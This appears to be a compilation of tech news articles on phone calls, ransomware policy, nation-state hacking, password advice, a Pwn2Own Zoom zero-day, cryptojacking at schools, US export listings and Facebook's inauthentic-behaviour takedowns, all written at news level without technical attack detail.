Information Technology

The smartphone is the ultimate convergence device. It takes a number of useful gadgets and combines them into a single, portable device. A smartphone can act as your portable computer, navigation device, camera, music player, and much more.It’s also a phone.And the phone is the most useless bit.Read more: Apple confirms iMessage locks users into iOS, and putting it on Android would hurt Apple
If you’re anything like me, you rarely, if ever, make a call. Instead, you send an email or a quick message. And as for calls you get in, a good 95 percent are junk, and the remainder could have been an email or a quick message.Calls are a wasteland. Pretty much every time I hit that green button on a call from someone who isn’t in my contacts, I end up regretting it. And folks on my contacts list know not to call me.

A quick look through my calls list for the past year shows little more than scams, timewasters, nonsense, and garbage. Perhaps one percent was useful, but again, could have been a message.The phone is a device from a different era. It’s a device that emits an annoying noise, demanding immediate attention. While the device itself has changed, it retains the worst of its original qualities — a device that emits an annoying noise and demands immediate attention.You could argue that text messages and emails are the same, and you’d be right. The difference is that these technologies have evolved a bit in order to try to remain relevant and useful. That said, I’d happily ditch text messaging too, because the signal to noise ratio is very poor there too.Maybe something could be done to make calls and texts a bit better. Visual voicemail on the iPhone has made this feature a tiny bit more bearable. Maybe something along the lines of Sign in with Apple ID, where I have the option of hiding my true phone number and use disposable ones that I can manage — and by manage, I mean block — down the line. Now, I’m not suggesting that Apple and Google rip the phone part out of their smartphones. Some of you still use the phone and text messaging. What I’m asking for is a way to kill both of them. I don’t know about you folks, but I could live without them. I’d even pay to have a smartphone that does everything a smartphone should do except be a phone.Let me know what you think in the comments below.

ZDNet Recommends More

Organisations continue to fall victim to ransomware, and yet progress on tackling these attacks, which now constitute one of the biggest security problems on the internet, remains slow.From small companies to councils, government agencies and big business, the number and range of organisations hit by ransomware is rising. One recent example; schools with 36,000 students have been hit, leaving pupils without access to email as attempts were made to get systems back online. That’s at least four chains of schools attacked in the last month.

Ransomware gangs are getting craftier, and nastier, in their relentless pursuit of profit. It’s not enough to break into computer systems and encrypt the data to render it useless. Now the crooks are stealing some of the data and threatening to reveal it. And it’s not just data such as customer records: the cyber criminals will look for anything that might be sensitive or embarrassing on the network, and use the threat of publishing it as leverage against victims. And in many cases it seems to work.SEE: Security Awareness and Training policy (TechRepublic Premium)So what can be done to stop these attacks? Organisations of all sizes need to understand the ransomware threat, and figure out how to improve their own security – even getting the basics right can go a long way towards deterring attacks. The software industry also needs to do a better job of building secure software. Is this going to happen? That’s unlikely, as there’s just too much pressure to ship software fast and generate profit. The multiple ways companies can customise and integrate software also means that even if it ships as perfectly secure, security holes will emerge as soon as it’s used in the real world. Worse, ransomware groups are adept at seizing on newly discovered flaws and utilising them as part of their attacks, with the ransom money providing funds to sustain longer and more complicated attacks. In the longer term, the general shift to cloud computing, which has so far proved more secure, might help. Tackling the perpetrators themselves is the next challenge, although here geography plays a big role. Many of these groups are located in Russia, which means that law enforcement has found it hard to pursue cases. It may be possible to disrupt the efforts of these groups in other ways: police have had some success in disrupting botnets and other online crime rings, so perhaps something similar is possible here, even if this disruption tends to be only temporary. Here again, there’s little chance of improvement in the short to medium term, unless there’s a significant thawing of international relations.To pay or not to pay?One of the trickiest decisions concerns ransom payment. It’s understandable that a company may feel it has no choice but to pay up to regain access to its data, given that the alternative is to go out of business. But every ransom paid rewards the cyber criminals and sends a signal to others that there’s profit to be made.

Making it illegal for companies to pay ransoms seems like a very big step to take. But this is increasingly being mentioned. A recent report from defence think tank RUSI (Royal United Services Institute) notes that “policymakers should carefully examine the feasibility and suitability of making ransom payment illegal in the UK, which could lead in turn to a ‘protective’ effect resulting from the discouragement of ransomware attacks against UK targets.”It’s a decision that could have some painful consequences. News of the change would take a while to filter through, so if any country were to ban ransom payment there would, at the very least, be a short to medium term situation where companies were still getting hit with ransomware.SEE: Ransomware: Why we’re now facing a perfect stormRansomware gangs are opportunists and may not realise that a company is based in the UK, and may encrypt the systems anyway. They’re unlikely to hand over the decryption key just because the victim can’t pay up.If companies can’t pay ransoms and don’t have any other way to restore their data, they will face huge costs and disruption – potentially enough to put them out of business. Even organisations with backups and the required technical know-how will be forced to spend time and money restoring their systems. That could put them at a significant disadvantage compared to ransomware victims based elsewhere.Ransomware gangs are certainly capable of avoiding certain territories when planning attacks (they tend to avoid Russia for example), so, in the longer term, a ban on paying ransoms may have the desired impact by making UK organisations less profitable targets. Still, there’s no sign that the government is currently planning on going down this route. But as the cost of ransomware attacks continues to rise, we need to find a way to counter them – and soon.ZDNET’S MONDAY MORNING OPENER The Monday Morning Opener is our opening salvo for the week in tech. Since we run a global site, this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US. It is written by a member of ZDNet’s global editorial board, which is comprised of our lead editors across Asia, Australia, Europe, and North America.PREVIOUSLY ON MONDAY MORNING OPENER:   More

Businesses are increasingly coming under fire from nation-state backed hackers as governments around the world engage in attacks to steal secrets or lay the foundations for future attacks.Nation States, Cyberconflict and the Web of Profit, a study by cybersecuity researchers at HP and criminologists at the University of Surrey, warns that the number of significant nation-state attacks has risen significantly over the last three years – and that enterprises and businesses are increasingly being targeted.An analysis of nation-state cyber attacks between 2017 and 2020 reveals that just over a third of organisations targeted were businesses: cyber defence, media, government and critical infrastructure are all also common targets in these attacks, but enterprise has risen to the top of the list.”Irrespective of sector or size, business appears now to face comparable risks from nation states as it has done from traditional cybercriminals,” said the research paper.The main aim of these attacks is obtaining intellectual property or business intelligence, with technology firms and pharmaceutical companies at particular risk. SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)The events of the last year have increased the risks because not only have nation states been conducting campaigns in an effort to gain access to research on Covid-19 vaccines, the way in which many people are working from home has left them – and their employers – at additional risk from phishing and other attacks.

“Nation states are devoting significant time and resources to achieving strategic cyber advantage to advance their national interests, intelligence gathering capabilities, and military strength through espionage, disruption and theft,” said Dr. Mike McGuire, senior lecturer in criminology at the University of Surrey.”Attempts to obtain IP data on vaccines and attacks against software supply chains demonstrate the lengths to which nation states are prepared to go to achieve their strategic goals.”Hackers are also willing to use techniques that could put many companies at risk in order to target a few.”There’s now a willingness to compromise thousands of networks and businesses, creating huge collateral damage, when in reality the true targets of those cyberattacks will have been much smaller,” said Ian Pratt, global head of security for personal systems at HP Inc.In order to protect networks against cyber attacks, the report recommends that organisations do everything possible to secure endpoints and to segment networks, so sensitive information isn’t stored in easy-to-reach areas if an attacker managers to gain entry to the network. It’s also recommended that organisations apply security patches in a timely manner, so they’re protected against known vulnerabilities when they emerge. “As the scope and sophistication of nation state attacks continues to increase, it’s vital that organizations invest in security that helps them to stay ahead of these constantly evolving threats,” said Pratt.MORE ON CYBERSECURITY More

People are using easy-to-guess passwords, including their pet’s name, family members’ names, significant dates, their favourite sports team – or even ‘Password’,  and that could be putting them at risk of their accounts being compromised by cyber criminals. Research by the National Cyber Security Centre (NCSC) suggests that 15% of people have used their pet’s name as their password at some point, while 14% have used the name of a family member.

A further 13% have used a significant date, such as a birthday or anniversary, while 6% have used the sports team they support as their password. While these passwords are easy for people to remember, it could be putting their accounts at risk of being broken into by criminals. Attackers could scrape information from public social media posts that could provide hints to things like pet names. They could then attempt to use this information to breach accounts. SEE: Security Awareness and Training policy (TechRepublic Premium) They could also use a brute force attack tool to attempt to crack accounts, which use simple one-word passwords with relative ease. The use of default credentials like ‘password’ also provides cyber criminals with an easy method of breaching accounts. By using a weak password, people could be putting personal information or financial details at risk – especially if that same password is used across multiple accounts.

They could even potentially put their employer at risk from cyberattacks, if the stolen password is also used to secure corporate accounts and cyber criminals attempt to see if the password they’ve taken from a personal account works. The NCSC is, therefore, urging people to follow their advice and make passwords three random words to help secure their accounts. The idea is that three words are relatively easy to remember, but by making them random, it’ll stop cyber criminals from being able to guess their way into accounts, even with the aid of brute force tools. “We may be a nation of animal lovers, but using your pet’s name as a password could make you an easy target for callous cyber criminals,” said Nicola Hudson, NCSC director for policy and communications. “I would urge everybody to visit cyberaware.gov.uk and follow our guidance on setting secure passwords, which recommends using passwords made up of three random words.”

ZDNet Recommends

The best password manager

Everyone needs a password manager. It’s the only way to maintain unique, hard-to-guess credentials for every secure site you and your team access daily.

Read More

The NCSC also recommends that users should make sure their email password is separate to any other password they have, because if an attacker does steal your email user name and password, it could provide them access to other sites that use your email address as the login name. SEE: Three billion phishing emails are sent every day. But one change could make life much harder for scammers In addition to this, the NCSC suggests that users should save passwords to their web browser. Not only does this allow users to easily login to websites, it also helps protect them against some cybercrime – for example, the password manager won’t work if the website is a fake version of the website designed to steal credentials. It’s also recommended that users should turn on two-factor authentication to provide an additional barrier to attacks.

MORE ON CYBERSECURITY More

A zero-day vulnerability in Zoom which can be used to launch remote code execution (RCE) attacks has been disclosed by researchers. 

Pwn2Own, organized by the Zero Day Initiative, is a contest for white-hat cybersecurity professionals and teams to compete in the discovery of bugs in popular software and services.  The latest competition included 23 entries, competing in different categories including web browsers, virtualization software, servers, enterprise communication, and local escalation of privilege.  For successful entrants, the financial rewards can be high — and in this case, Daan Keuper and Thijs Alkemade earned themselves $200,000 for their Zoom discovery.  The researchers from Computest demonstrated a three-bug attack chain that caused an RCE on a target machine, and all without any form of user interaction.  As Zoom has not yet had time to patch the critical security issue, the specific technical details of the vulnerability are being kept under wraps. However, an animation of the attack in action demonstrates how an attacker was able to open the calculator program of a machine running Zoom following its exploit.  As noted by Malwarebytes, the attack works on both Windows and Mac versions of Zoom, but it has not — yet — been tested on iOS or Android. The browser version of the videoconferencing software is not impacted. 

In a statement to Tom’s Guide, Zoom thanked the Computest researchers and said the company was “working to mitigate this issue with respect to Zoom Chat.” In-session Zoom Meetings and Zoom Video Webinars are not affected. “The attack must also originate from an accepted external contact or be a part of the target’s same organizational account,” Zoom added. “As a best practice, Zoom recommends that all users only accept contact requests from individuals they know and trust.” Vendors have a 90-day window, which is standard practice in vulnerability disclosure programs, to resolve the security issues found. End-users just need to wait for a patch to be issued — but if worried, they can use the browser version in the meantime.  “This event, and the procedures and protocols that surround it, demonstrate very nicely how white-hat hackers work, and what responsible disclosure means,” Malwarebytes says. “Keep the details to yourself until protection in the form of a patch is readily available for everyone involved (with the understanding that vendors will do their part and produce a patch quickly).” Other successful attacks of note during the content include: Apple Safari: Jack Dates, kernel-level code execution, $100,000 Microsoft Exchange: DEVCORE, complete server takeover, $200,000 Microsoft Teams: OV, code execution, $200,000 Ubuntu Desktop: Ryota Shiga, standard user to root, $30,000

Previous and related coverageHave a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

US educational organizations are being targeted by threat actors intent on compromising their networks to covertly mine cryptocurrency. 

Otherwise known as cryptojacking attacks, this form of assault is usually mired in stealth as the overall aim is to quietly install cryptocurrency mining components that leech stolen computational power. Miner software abused by cyberattackers may attempt to generate cryptocurrency including Monero (XMR), Litecoin (LTC), Bitcoin (BTC), and Ethereum (ETH), and even if small amounts are mined, compromising large numbers of systems can make these attacks lucrative.   According to a new advisory released by Palo Alto Network’s Unit 42 team, cryptojacking incidents have recently taken place against educational institutions in Washington State. The researchers say that a UPX-packed cpuminer — used to mine LTC and BTC — has been delivered by way of malicious traffic.  The first attack, spotted on February 16, involved a malicious HTTP request sent to a domain owned by an educational establishment that at first seemed like a “trivial command injection vulnerability,” according to the team, but upon further examination, revealed that it was actually a command for a webshell backdoor.  If deployment is successful, the backdoor is then able to call and execute the cryptomining payload. In addition, the malware will download a mini shell that pretends to be a wp-load.php file.

“Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet,” the report says.  Cryptocurrency mined on infected systems is sent to two wallets owned by the operators (1,2).  In two other incidents, there were some differences when it came to user agent strings, pass values, and algorithms, but the general attack method remained the same.  “The malicious request […] exhibits several similarities,” Unit 42 noted. “It’s the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it’s likely the same perpetrator behind the cryptojacking operation.” In March, a study of K-12 schools across the United States revealed a “record-breaking” year of cybersecurity incidents in 2020. The report cataloged over 400 incidents including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

In another move aimed at restricting the development of Chinese technology, the US Commerce Department has added seven Chinese supercomputing entities to its Entity List for allegedly supporting China’s military efforts. The newly added entities that are companies include the Shanghai High-Performance Integrated Circuit Design Center, Sunway Microelectronics, Tianjin Phytium Information Technology. The remaining organisations are the National Supercomputing Centers in Jinan, Shenzhen, WuXi, and Zhengzhou.Companies placed on the Entity List are banned from buying parts and components from US companies without government approval.According to the department, these entities are involved with building supercomputers used as part of China’s military efforts to destabilise military modernisation efforts and build weapons of mass destruction programs. “Supercomputing capabilities are vital for the development of many — perhaps almost all — modern weapons and national security systems, such as nuclear weapons and hypersonic weapons. The Department of Commerce will use the full extent of its authorities to prevent China from leveraging US technologies to support these destabilising military modernisation efforts,” US Secretary of Commerce Gina Raimondo said. The newest Entity List additions are the latest among many that the US has made against Chinese businesses, including Huawei, which was placed on the Entity List almost two years ago. In the past year, the US has added Chinese chipmaker SMIC, drone company DJI Technology, and a bevy of other Chinese-based technology companies to the list.

The reasons for doling out these restrictions have ranged from preventing China’s alleged efforts of destabilising military activities, to standing up against the repression of Uyghur Muslims and other Muslim ethnic minorities within China, to spying. In addition to placing various Chinese companies on the Entity List, the US government has also enforced other restrictions onto Chinese technology companies by labelling them as national security threats or Communist Chinese military companies (CCMC). Related Coverage More

Facebook has removed a troll farm, spreaders of misinformation, and creators of deepfake images in its latest moderation efforts. 

The company’s latest Coordinated Inauthentic Behavior (CIB) report, published this week (.PDF), lists Facebook’s most recent efforts to reduce coordinated, inauthentic behavior across the network.According to the March CIB report, Facebook investigated and wiped out a “long-running” troll farm located in Albania. The troll farm’s members primarily targeted an Iranian audience and are thought to have ties to Mojahedin-e Khalq (MEK), a political-militant group made up of several thousand members.  MEK was exiled to Albania in the 1980s and now appears to be running a network made up of both genuine and fake accounts to spread information that is critical of the Iranian government and that praises MEK’s activities.  Facebook says that MEK-related content sharing spiked in 2017 and 2020 via three separate clusters, but the majority of the group’s efforts to grow an audience have failed.  “Most of its accounts were run by operators in Albania who routinely shared technical infrastructure,” the company notes. “This meant that the same operator was able to run multiple accounts; conversely, multiple operators were able to run the same account. These are some of the hallmarks of a so-called troll farm — a physical location where a collective of operators share computers and phones to jointly manage a pool of fake accounts as part of an influence operation.”

In addition, Facebook is tackling deepfakes, images generated through the application of artificial intelligence (AI). While the company started taking down fake imagery three years ago, now, generative adversarial networks (GAN) are using deepfakes to pose as independent news outlets and investigative journalists.  After reviewing research provided by FireEye on a GAN network located in Spain and El Salvador, the firm removed accounts and pages that were publishing information concerning a mayoral election at “spam-like” rates. A further two networks have also been wiped out, bringing Facebook’s total deletion count to seven operations that made use of AI-generated images.  The social media giant has also documented its customary disruption of inauthentic networks. In total, 14 CIB operations were disrupted in March that originated from countries including Argentina, Egypt, Israel, Mexico, and Georgia, leading to the deletion of over 1,100 accounts, 255 pages, and 34 groups.  Last month, Facebook said it had managed to detect and take down a Chinese network of cyberattackers using the platform to distribute malware. The operators, thought to be part of Earth Empusa or Evil Eye groups, used fake profiles to target journalists and activists.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More